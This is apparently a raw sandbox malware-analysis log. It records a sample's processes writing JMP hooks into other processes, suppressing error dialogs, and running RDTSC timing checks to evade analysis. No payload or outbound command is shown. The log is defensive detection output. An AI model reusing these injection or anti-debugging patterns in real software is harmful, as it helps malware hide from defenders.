Source: C:\ProgramData\61312899942613011832.exe | Memory written: PID: 5372 base: 778E9A00 value: E9 0A 66 D7 88 |
Source: C:\ProgramData\61312899942613011832.exe | Memory written: PID: 5372 base: 670007 value: E9 7B 4C 2B 77 |
Source: C:\ProgramData\61312899942613011832.exe | Memory written: PID: 5372 base: 77924C80 value: E9 8E B3 D4 88 |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Memory written: PID: 5780 base: 15D0005 value: E9 FB 99 31 76 |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Memory written: PID: 5780 base: 778E9A00 value: E9 0A 66 CE 89 |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Memory written: PID: 5780 base: 15E0007 value: E9 7B 4C 34 76 |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Memory written: PID: 5780 base: 77924C80 value: E9 8E B3 CB 89 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 6128 base: DB0005 value: E9 FB 99 B3 76 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 6128 base: 778E9A00 value: E9 0A 66 4C 89 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 6128 base: DC0007 value: E9 7B 4C B6 76 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 6128 base: 77924C80 value: E9 8E B3 49 89 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 6128 base: F70005 value: E9 FB BF 94 76 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 6128 base: 778BC000 value: E9 0A 40 6B 89 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 6128 base: FA0008 value: E9 AB E0 95 76 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 6128 base: 778FE0B0 value: E9 60 1F 6A 89 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 6128 base: FB0005 value: E9 CB 5A 95 73 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 6128 base: 74905AD0 value: E9 3A A5 6A 8C |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 6128 base: FC0005 value: E9 5B B0 96 73 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 6128 base: 7492B060 value: E9 AA 4F 69 8C |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 6128 base: 1210005 value: E9 DB F8 A9 75 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 6128 base: 76CAF8E0 value: E9 2A 07 56 8A |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 6128 base: 1220005 value: E9 FB 42 AB 75 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 6128 base: 76CD4300 value: E9 0A BD 54 8A |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Memory written: PID: 4948 base: 1340005 value: E9 FB 99 5A 76 |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Memory written: PID: 4948 base: 778E9A00 value: E9 0A 66 A5 89 |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Memory written: PID: 4948 base: 1350007 value: E9 7B 4C 5D 76 |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Memory written: PID: 4948 base: 77924C80 value: E9 8E B3 A2 89 |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | Memory written: PID: 3920 base: 7FFC32240008 value: E9 7B A9 EA FF |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | Memory written: PID: 3920 base: 7FFC320EA980 value: E9 90 56 15 00 |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | Memory written: PID: 3920 base: 7FFC3225000D value: E9 6B 9B EC FF |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | Memory written: PID: 3920 base: 7FFC32119B70 value: E9 AA 64 13 00 |
Source: C:\Users\user\1000018002\avicapn32.exe | Memory written: PID: 1112 base: 1C70005 value: E9 FB 99 C7 75 |
Source: C:\Users\user\1000018002\avicapn32.exe | Memory written: PID: 1112 base: 778E9A00 value: E9 0A 66 38 8A |
Source: C:\Users\user\1000018002\avicapn32.exe | Memory written: PID: 1112 base: 1C90007 value: E9 7B 4C C9 75 |
Source: C:\Users\user\1000018002\avicapn32.exe | Memory written: PID: 1112 base: 77924C80 value: E9 8E B3 36 8A |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2820 base: FB0005 value: E9 FB 99 93 76 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2820 base: 778E9A00 value: E9 0A 66 6C 89 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2820 base: FC0007 value: E9 7B 4C 96 76 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2820 base: 77924C80 value: E9 8E B3 69 89 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2820 base: FD0005 value: E9 FB BF 8E 76 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2820 base: 778BC000 value: E9 0A 40 71 89 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2820 base: 1170008 value: E9 AB E0 78 76 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2820 base: 778FE0B0 value: E9 60 1F 87 89 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2820 base: 1180005 value: E9 CB 5A 78 73 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2820 base: 74905AD0 value: E9 3A A5 87 8C |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2820 base: 1190005 value: E9 5B B0 79 73 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2820 base: 7492B060 value: E9 AA 4F 86 8C |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2820 base: 11A0005 value: E9 DB F8 B0 75 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2820 base: 76CAF8E0 value: E9 2A 07 4F 8A |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2820 base: 11B0005 value: E9 FB 42 B2 75 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2820 base: 76CD4300 value: E9 0A BD 4D 8A |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\ProgramData\61312899942613011832.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\1000018002\avicapn32.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Source: C:\Users\user\1000018002\avicapn32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | RDTSC instruction interceptor: First address: 000000000176B0FE second address: 000000000176B10D instructions: 0x00000000 rdtsc 0x00000002 inc cl 0x00000004 not dh 0x00000006 neg cl 0x00000008 mov dl, 15h 0x0000000a dec cl 0x0000000c sub ax, di 0x0000000f rdtsc |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | RDTSC instruction interceptor: First address: 00000000014D7B49 second address: 00000000014D7B51 instructions: 0x00000000 rdtsc 0x00000002 inc ecx 0x00000003 movzx ecx, si 0x00000006 inc ecx 0x00000007 pop eax 0x00000008 rdtsc |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | RDTSC instruction interceptor: First address: 00000000016693EB second address: 0000000001669432 instructions: 0x00000000 rdtsc 0x00000002 dec ecx 0x00000003 xchg eax, edi 0x00000004 inc ecx 0x00000005 pop eax 0x00000006 dec eax 0x00000007 cmovbe eax, eax 0x0000000a inc cx 0x0000000c xchg esp, ebx 0x0000000e inc ecx 0x0000000f pop edx 0x00000010 inc ecx 0x00000011 xchg bh, cl 0x00000013 dec eax 0x00000014 cwde 0x00000015 cdq 0x00000016 inc ecx 0x00000017 pop edi 0x00000018 pop ecx 0x00000019 inc bp 0x0000001b movsx esp, dl 0x0000001e cwd 0x00000020 lahf 0x00000021 inc ecx 0x00000022 pop ecx 0x00000023 inc ecx 0x00000024 movzx ebx, si 0x00000027 inc eax 0x00000028 setb bh 0x0000002b inc cx 0x0000002d xchg esp, ebx 0x0000002f pop esi 0x00000030 movzx eax, bp 0x00000033 inc cx 0x00000035 movsx eax, al 0x00000038 pop edi 0x00000039 pop ebx 0x0000003a setb ah 0x0000003d inc ebp 0x0000003e movzx esi, ax 0x00000041 inc ecx 0x00000042 pop esp 0x00000043 dec esp 0x00000044 movzx esi, ax 0x00000047 rdtsc |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | RDTSC instruction interceptor: First address: 00000000016D9DA1 second address: 00000000014DE6C8 instructions: 0x00000000 rdtsc 0x00000002 cdq 0x00000003 pop ebp 0x00000004 dec esp 0x00000005 arpl dx, ax 0x00000007 dec ecx 0x00000008 cmovb edi, ecx 0x0000000b inc ecx 0x0000000c pop ebx 0x0000000d inc ebp 0x0000000e mov bh, bh 0x00000010 dec ecx 0x00000011 arpl dx, cx 0x00000013 inc ecx 0x00000014 pop eax 0x00000015 cbw 0x00000017 dec eax 0x00000018 movsx ecx, di 0x0000001b dec ebp 0x0000001c cmovle esi, eax 0x0000001f inc ecx 0x00000020 pop edx 0x00000021 cbw 0x00000023 jmp 00007FB5AC78D92Ch 0x00000028 inc ecx 0x00000029 pop edi 0x0000002a inc esp 0x0000002b movzx ecx, si 0x0000002e pop ecx 0x0000002f cwde 0x00000030 rdtsc |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | RDTSC instruction interceptor: First address: 000000000176451B second address: 000000000176452D instructions: 0x00000000 rdtsc 0x00000002 inc ecx 0x00000003 pop edx 0x00000004 dec ecx 0x00000005 movzx ebx, ax 0x00000008 inc ecx 0x00000009 pop edi 0x0000000a cbw 0x0000000c pop ecx 0x0000000d inc eax 0x0000000e mov dh, dh 0x00000010 inc ecx 0x00000011 pop ecx 0x00000012 rdtsc |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | RDTSC instruction interceptor: First address: 000000000176452D second address: 000000000176453B instructions: 0x00000000 rdtsc 0x00000002 inc cx 0x00000004 bswap esi 0x00000006 pop esi 0x00000007 inc esp 0x00000008 mov ah, dl 0x0000000a pop edi 0x0000000b dec esp 0x0000000c arpl bp, si 0x0000000e rdtsc |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | RDTSC instruction interceptor: First address: 00000000016FA149 second address: 0000000001BA06F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5ACE2F84Fh 0x00000007 inc ecx 0x00000008 pop ecx 0x00000009 pop esi 0x0000000a inc ecx 0x0000000b mov bl, bl 0x0000000d pop edi 0x0000000e movsx eax, bp 0x00000011 rdtsc |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | RDTSC instruction interceptor: First address: 000000000173E4D5 second address: 0000000001696CB2 instructions: 0x00000000 rdtsc 0x00000002 pop ecx 0x00000003 cwd 0x00000005 inc ecx 0x00000006 pop ecx 0x00000007 lahf 0x00000008 pop esi 0x00000009 pop edi 0x0000000a lahf 0x0000000b dec ebp 0x0000000c arpl bp, sp 0x0000000e pop ebx 0x0000000f jmp 00007FB5AC8E17FCh 0x00000014 inc ecx 0x00000015 pop esp 0x00000016 rdtsc |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | RDTSC instruction interceptor: First address: 00000000016C0841 second address: 000000000172F30A instructions: 0x00000000 rdtsc 0x00000002 inc esp 0x00000003 movsx ebp, bx 0x00000006 inc ecx 0x00000007 pop ebp 0x00000008 inc bp 0x0000000a movzx edi, cl 0x0000000d pop ebp 0x0000000e inc ecx 0x0000000f pop ebx 0x00000010 inc ecx 0x00000011 pop eax 0x00000012 inc ecx 0x00000013 pop edx 0x00000014 inc ebp 0x00000015 movsx edi, dx 0x00000018 dec ebp 0x00000019 arpl si, si 0x0000001b dec eax 0x0000001c movzx edx, di 0x0000001f inc ecx 0x00000020 pop edi 0x00000021 mov si, 6F30h 0x00000025 dec eax 0x00000026 cdq 0x00000027 dec eax 0x00000028 movsx ebx, bp 0x0000002b pop ecx 0x0000002c jmp 00007FB5AC9F7D3Ch 0x00000031 inc ecx 0x00000032 pop ecx 0x00000033 cdq 0x00000034 inc cx 0x00000036 movsx eax, dh 0x00000039 inc esp 0x0000003a movsx esp, bp 0x0000003d pop esi 0x0000003e cbw 0x00000040 pop edi 0x00000041 pop ebx 0x00000042 rdtsc |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | RDTSC instruction interceptor: First address: 000000000172F30A second address: 000000000172F310 instructions: 0x00000000 rdtsc 0x00000002 inc ecx 0x00000003 pop esp 0x00000004 cwd 0x00000006 rdtsc |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | RDTSC instruction interceptor: First address: 00000000016B2E25 second address: 00000000016B2E5E instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 mov edi, 61C07295h 0x00000009 inc ecx 0x0000000a pop eax 0x0000000b dec eax 0x0000000c cdq 0x0000000d dec ebp 0x0000000e movsx esp, sp 0x00000011 lahf 0x00000012 inc ecx 0x00000013 pop edx 0x00000014 dec eax 0x00000015 cdq 0x00000016 inc ecx 0x00000017 pop edi 0x00000018 movzx ax, ah 0x0000001c cwd 0x0000001e cdq 0x0000001f pop ecx 0x00000020 inc ecx 0x00000021 pop ecx 0x00000022 inc esp 0x00000023 movzx esp, di 0x00000026 inc ebp 0x00000027 movsx esp, dx 0x0000002a inc ecx 0x0000002b xchg dh, al 0x0000002d pop esi 0x0000002e cbw 0x00000030 dec ecx 0x00000031 arpl sp, bx 0x00000033 inc cx 0x00000035 movzx eax, bl 0x00000038 pop edi 0x00000039 rdtsc |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | RDTSC instruction interceptor: First address: 00000000010EEF30 second address: 00000000010EEF3F instructions: 0x00000000 rdtsc 0x00000002 inc cl 0x00000004 not dh 0x00000006 neg cl 0x00000008 mov dl, 15h 0x0000000a dec cl 0x0000000c sub ax, di 0x0000000f rdtsc |
Source: C:\ProgramData\61312899942613011832.exe | RDTSC instruction interceptor: First address: 00000000017925FE second address: 00000000017B33CF instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 call 00007FB5AC944211h 0x00000008 call 00007FB5AC8E2A91h 0x0000000d mov dword ptr [esp+04h], 7A546ADEh 0x00000015 lea esp, dword ptr [esp+04h] 0x00000019 call 00007FB5ACA9592Ah 0x0000001e push edx 0x0000001f push eax 0x00000020 cmovnl eax, ebp 0x00000023 push ebp 0x00000024 rdtsc |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | RDTSC instruction interceptor: First address: 0000000000A125FE second address: 0000000000A333CF instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 call 00007FB5AC943F91h 0x00000008 call 00007FB5AC8E2811h 0x0000000d mov dword ptr [esp+04h], 7A546ADEh 0x00000015 lea esp, dword ptr [esp+04h] 0x00000019 call 00007FB5ACA956AAh 0x0000001e push edx 0x0000001f push eax 0x00000020 cmovnl eax, ebp 0x00000023 push ebp 0x00000024 rdtsc |
Source: C:\Windows\SysWOW64\rundll32.exe | RDTSC instruction interceptor: First address: 000000000527D526 second address: 000000000527D559 instructions: 0x00000000 rdtsc 0x00000002 movsx dx, bh 0x00000006 dec cl 0x00000008 or edx, ecx 0x0000000a bts edx, ecx 0x0000000d xchg dh, dh 0x0000000f not cl 0x00000011 cbw 0x00000013 neg cl 0x00000015 bsf eax, eax 0x00000018 mov eax, 78B605B0h 0x0000001d or ah, FFFFFF9Eh 0x00000020 add cl, FFFFFF94h 0x00000023 xor bl, cl 0x00000025 or dh, dl 0x00000027 push ebp 0x00000028 inc ebp 0x00000029 cdq 0x0000002a cwd 0x0000002c push esi 0x0000002d push ebx 0x0000002e xor bp, di 0x00000031 cwd 0x00000033 rdtsc |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | RDTSC instruction interceptor: First address: 00007FF676941E5F second address: 00007FF676941E7F instructions: 0x00000000 rdtsc 0x00000002 pop ecx 0x00000003 inc ecx 0x00000004 pop edi 0x00000005 inc ecx 0x00000006 pop ecx 0x00000007 inc ebp 0x00000008 cmp al, bh 0x0000000a inc bp 0x0000000c bsr eax, edx 0x0000000f inc ecx 0x00000010 pop edx 0x00000011 inc esp 0x00000012 btr edx, esp 0x00000015 pop ebp 0x00000016 btr ebx, 44h 0x0000001a dec eax 0x0000001b btc edi, esi 0x0000001e popfd 0x0000001f lahf 0x00000020 rdtsc |
